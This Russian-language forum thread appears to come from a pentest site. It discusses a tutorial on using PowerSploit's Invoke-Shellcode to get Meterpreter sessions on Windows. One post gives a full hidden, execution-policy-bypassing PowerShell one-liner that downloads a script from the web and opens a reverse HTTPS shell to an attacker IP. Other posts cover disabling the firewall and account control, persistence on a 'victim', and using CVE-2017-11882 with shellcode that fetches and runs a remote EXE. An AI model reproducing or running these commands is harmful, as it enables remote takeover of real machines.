Вы используете устаревший браузер. Этот и другие сайты могут отображаться в нем неправильно. Необходимо обновить браузер или попробовать использовать другой.
Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
Это уже в сторону закрепления в системе.Просто персистенс сделать ,что бы в дальнейшем можно было подключаться к жертве.Но опять же таки если речь идет про реверс соединение ,то нам в любом случае нужно знать айпи машины для того что бы сделать на нее реверс конект
что-то не получается. один ноут на win 7 на другом кали 1. запускаю на кали use exploit/multi/handler и set payload windows/meterpreter/reverse_https. в винде (Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.37 -Lport 8443 -Force) lhost и lport одинаковый. сделал в винде Set-ExecutionPolicy Unrestricted отключил брандмауэр отключил контроль учетных записей и сессия не приходит. netstat -na не показывает соединения, но в процессы висят. в какую сторону копать?
Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?
На вирт. машине стоит Win7 SP1 там PS версии 2, после запуска окно PS закрывается, процесс висит в диспетчере, но соединения нет. Пинги проходят в обе стороны, и с Unicorn-ом та же история, может PS обновить.
[doublepost=1506592812,1506576232][/doublepost]Поддерживают ли скрипты reverse_tcp и _https версию Wln7 PS ver. 2?
я тут взял эту штукенцию и проверил не менял айпи какой был такой и оставил нажал он куда отправился в какую вселенную можно потом от этого избавиться?)
Вопрос к компетентным товарищам - реально ли такое провернуть не со скриптом PS, а с exe?
И,да, перегонять в формат .ps1 через штатный exe2hex я пробовал, конечный скрипт не запускается. Через тот же самый IEX - тоже никак.
Поскажите, пожалуйста, я себе уже мозг сломал
Вопрос к компетентным товарищам - реально ли такое провернуть не со скриптом PS, а с exe?
И,да, перегонять в формат .ps1 через штатный exe2hex я пробовал, конечный скрипт не запускается. Через тот же самый IEX - тоже никак.
Поскажите, пожалуйста, я себе уже мозг сломал
Чуть больше конкретизирую: используется CVE-2017-11882. В качестве исполняемой строки в документ вкладывается шеллкод, качающий из внешней Сети ЕХЕ и запускающий его.
Пока дошел до этого:
Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)
Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1
Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:
Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)
Народ, такая ситуация, при запуске команды в ps он выдаёт что проверьте синтаксис и то что invokeshellcode не найдена хотя взял весь код и скопировал. Что может быть?
На данном сайте используются cookie-файлы, чтобы персонализировать контент и сохранить Ваш вход в систему, если Вы зарегистрируетесь.
Продолжая использовать этот сайт, Вы соглашаетесь на использование наших cookie-файлов.